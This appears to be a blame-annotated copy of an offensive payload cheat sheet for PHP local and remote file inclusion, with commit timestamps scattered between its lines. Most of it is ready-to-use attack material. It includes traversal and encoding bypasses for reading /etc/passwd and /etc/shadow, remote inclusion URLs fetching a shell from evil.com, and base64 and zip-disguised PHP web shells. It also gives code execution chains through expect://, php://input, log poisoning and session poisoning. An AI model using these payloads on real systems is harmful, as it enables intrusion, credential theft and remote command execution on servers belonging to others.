2016-10-20 02:39:06 +00:00
# Local/Remote File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
2017-08-15 00:37:09 +00:00
Interesting files to check out :
```
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
2017-09-23 22:32:55 +00:00
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```
## Basic LFI
```
http://example.com/index.php?page=../../../etc/passwd
Null byte
http://example.com/index.php?page=../../../etc/passwd%00
Double encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Path truncation
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
Filter bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
2017-08-15 00:37:09 +00:00
```
## Basic RFI (null byte, double encoding and other tricks)
```
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
## LFI / RFI Wrappers
2017-07-02 21:10:34 +00:00
2016-11-03 16:56:15 +00:00
LFI Wrapper rot13 and base64 - php://filter case insensitive
2016-10-20 02:39:06 +00:00
```
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
2017-07-02 21:10:34 +00:00
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
can be chained with a compression wrapper
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
2016-10-20 02:39:06 +00:00
```
2017-07-02 21:10:34 +00:00
LFI Wrapper ZIP
2016-10-20 02:39:06 +00:00
```python
2017-11-09 08:05:50 +00:00
echo "< pre > <?php system($_GET['cmd']); ?> < / pre > " > payload.php;
2017-08-15 00:37:09 +00:00
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
2017-07-02 21:10:34 +00:00
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=zip://shell.jpg%23payload.php
2016-10-20 02:39:06 +00:00
```
2017-07-02 21:10:34 +00:00
RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?> " payload
2016-10-20 02:39:06 +00:00
```
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```
2017-07-02 21:10:34 +00:00
RFI Wrapper EXPECT
```
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
2017-09-23 22:32:55 +00:00
Bonus XSS
2017-08-15 00:37:09 +00:00
XSS via RFI/LFI with "< svg onload = alert(1) > " payload
2016-10-20 02:39:06 +00:00
```
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
2016-10-20 02:39:06 +00:00
```
2017-08-15 00:37:09 +00:00
## LFI to RCE via /proc/*/fd
1. Upload a lot of shells (for example : 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
2017-09-23 22:32:55 +00:00
/proc/self/environ can also be used
2017-08-15 00:37:09 +00:00
## LFI to RCE via Upload
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
You can injected the <?php system($_GET['c']); ?> into the metadata
2017-09-13 21:55:29 +00:00
## LFI to RCE via Phpinfo()
https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
2017-09-23 22:32:55 +00:00
## LFI to RCE via input:// stream
2017-09-23 22:37:56 +00:00
Specify your payload in the POST parameters
```
http://example.com/index.php?page=php://input
POST DATA: <? system('id'); ?>
```
2017-09-23 22:32:55 +00:00
## LFI to RCE via controlled log file
Just append your PHP code into the log file and include it.
```
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```
## LFI to RCE via PHP Sessions
Check if the website use PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Set the cookie to <?php system('cat /etc/passwd');?>
```
login=1& user=<?php system("cat /etc/passwd");?> & pass=password& lang=en_us.php
```
Use the LFI to include the PHP session file
```
login=1& user=admin& pass=password& lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
## Checklist - Common ways of upgrading from LFI to RCE
```
Using file upload forms/functions
Using the PHP wrapper expect://command
Using the PHP wrapper php://file
Using the PHP wrapper php://filter
Using PHP input:// stream
Using data://text/plain;base64,command
Using /proc/self/environ
Using /proc/self/fd
Using PHP Session
Using log files with controllable input like:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```
2016-10-20 02:39:06 +00:00
## Thanks to
2017-07-04 21:17:59 +00:00
* [OWASP LFI ](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion )
* [HighOn.coffee LFI Cheat ](https://highon.coffee/blog/lfi-cheat-sheet/ )
2017-08-15 00:37:09 +00:00
* [Turning LFI to RFI ](https://l.avala.mp/?p=241 )
2017-09-13 21:55:29 +00:00
* [Is PHP vulnerable and under what conditions? ](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html )
2017-09-23 22:32:55 +00:00
* [Upgrade from LFI to RCE via PHP Sessions ](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ )
* [Local file inclusion tricks ](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html )
